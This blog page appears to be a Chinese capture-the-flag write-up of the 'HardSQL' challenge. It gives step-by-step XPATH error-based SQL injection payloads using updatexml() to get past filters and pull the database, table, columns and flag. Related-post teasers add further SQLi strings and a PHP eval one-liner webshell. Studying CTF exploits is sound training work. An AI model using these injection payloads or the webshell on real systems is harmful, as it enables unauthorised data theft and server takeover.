[极客大挑战 2019]HardSQL 1

时间：2024-11-08 18:43:14浏览次数：1

标签：username 极客 23 HardSQL 0x7e 2019 updatexml password concat

[极客大挑战 2019]HardSQL 1

打开实例，发现是个登陆页面，查看源代码，发现又是GET提交check.php

万能密码尝试

不太行，怀疑字段或者空格被过滤，尝试闭合不加其他东西

确认空格、union、and等都被过滤了，尝试加个括号

并未出现你可知被我速住了，臭弟弟字样，()未被过滤吧，尝试采用updatexml()函数，构造payload（查库）：

?username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=admin

成功拿到当前数据库名geek，确定为XPATH报错注入

查表

?username=1'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e),1))%23&password=admin

获得表名H4rDsq1，查字段

?username=1'or(updatexml(1,concat(0x7e,(select(column_name)from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=admin

回显列太多，采用group_concat()包裹回显字段

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=admin

成功获得字段列表：id username password

查字段数据

?username=1'or(updatexml(1,concat(0x7e,(select(concat(id,',',username,',',substring(password)))from(H4rDsq1)),0x7e),1))%23
&password=admin

成功看到flag，因为长度问题，这边的flag显示并不完整

尝试使用substring函数，发现被过滤

?username=1'or(updatexml(1,concat(0x7e,(select(concat(id,',',username,',',substring(password,0,100)))from(H4rDsq1)),0x7e),1))%23
&password=admin

思考片刻，决定采用left()和right()函数

首先先计算这边的最大长度，为33个字符

所以分两次拿取flag

left()，拿区第一段

?username=1'or(updatexml(1,concat(0x7e,(select(concat(left(password,33)))from(H4rDsq1)),0x7e),1))%23
&password=admin

flag{09f315c2-c334-4f3a-8de9-dc

right()，拿取第二段，第二段需要包含}，经过多次尝试为偏移31位

?username=1'or(updatexml(1,concat(0x7e,(select(concat(right(password,31)))from(H4rDsq1)),0x7e),1))%23
&password=admin

c2-c334-4f3a-8de9-dc6df0232a40}

去除重复的文本，最终flag为

flag{09f315c2-c334-4f3a-8de9-dc6df0232a40}

标签：username,极客,23,HardSQL,0x7e,2019,updatexml,password,concat
From： https://www.cnblogs.com/tazmi/p/18535681

[极客大挑战 2019]BuyFlag 1
[极客大挑战2019]BuyFlag1打开实例发现pay.php页面，有提示信息打开源码发现passwordpost提交逻辑burpsuite抓包传参，传入money和password参数，这里password是==弱比较,所以加个字符就可以绕过password=404a&money=100000000回显发现并没有变化注意到学生需要CUIT(Only......
[强网杯 2019]随便注 1
[强网杯2019]随便注1万能密码上一波，回显成功，判断为'闭合注入?inject=1'or1=1--+(?inject=1unionselect1,2,3)union尝试，根据回显，发现存在字段过滤,过滤了select包括where等操作/select|update|delete|drop|insert|where|\./i尝试闭合堆叠?inject=1';showdat......
[极客大挑战 2019]Upload 1
[极客大挑战2019]Upload1打开实例为文件上传页面，代码审计，发现为php文件，采用php马采用bp抓包修改后缀绕过，上传一句话木马<?phpphpinfo();@eval($_POST['cmd']);?>回显错误，显示不能为php，存在文件类型过滤尝试采用phtm文件包含php绕过显示非image文件尝试采用GIF89......
[极客大挑战 2019]Secret File 1
[极客大挑战2019]SecretFile1代码审计发现页面/Archive_room.php访问页面点击SECRET按钮，bp抓包发现302重定向，附带一个注释页面secr3t.php访问secr3t.php，代码审计访问flag.php,发现一个贱贱的页面，确认是文件包含看不到页面且禁用../等参数，考虑用php的base64回显，paylo......
[极客大挑战 2019]PHP 1
[极客大挑战2019]PHP1打开文件发现提示信息“备份文件”,查看源码并未发现其他有效信息采用dirsearch爆破目录，找到www.zip文件解压zip，发现是源码泄露提交flag，发现不正确，看到index.php源码中有Get传参，然后反序列化函数unserialize()，判断为反序列化漏洞;查看class.php可......
[极客大挑战 2019]LoveSQL 1
[极客大挑战2019]LoveSQL1代码审计，发现表单方式为get提交到check.php万能密码admin'or1=1#登录成功，这边我以为密码就是flag，结果并不是，结合题目信息，猜想这应该是根据账号密码的注入尝试闭合?username=admin'and1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正......
Microsoft Office 2019 (office全家桶)for Mac/Windows电脑安装包
MicrosoftOffice2019forMac（Office全家桶）是一款功能全面且强大的办公软件套件，专为Mac用户设计。Mac苹果电脑下载：Office2019(含激活秘钥)Windows电脑下载：Office2019(含批量许可) 以下是其主要特点和优势：一、界面设计采用了Mac系统的设......
不管你是什么客，帽客，极客，杰克，交易客，博客，博弈客，旅客…嗯那头巨鲸惊醒了，睡醒沉睡了一个世
特朗普作为交易员的掌舵人，具有剁手的品质，他能够顺利到达彼岸的原因只有一个，他的止损打的很大，你是猜不到是多大的？全无古人的支持.没有像他这种，Comeon二进宫的人.他所惧怕的也只有一个，后面来的人，他的儿子小唐纳德.你的反应很迟钝呢，中国外交部的都在发了电报祝贺特朗普了，你还......
CF1270 Good Bye 2019
Dashboard玩构造玩的，服了。A拥有最大牌的必胜。linkB若相邻的差$\ge2$则有解，否则根据变化连续性一定无解。linkC加两个数，第一个数为之前所有数的异或和。加进来之后异或为0。第二个数为加完第一个数之后的和。linkD考虑$k=n-1$时，分别询问除去每个数之后的第\(......
基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装
基于Arcgis10.8+VS2019的ArcObjectsSDKNet安装首先Arcgis10.8和Arcgis10.8.1所需要的ArcObjectsSDKNet版本是不同的在使用10.8的ArcObjectsSDKNet在Arcgis10.8.1的基础上是安装不了的，会检测不到在安装Arcgis10.8的基础上，下载Arcgis10.8的ArcObjectsSDKNet，解压后进行安装连接......

[极客大挑战 2019]HardSQL 1

[极客大挑战 2019]HardSQL 1

相关文章

赞助商

阅读排行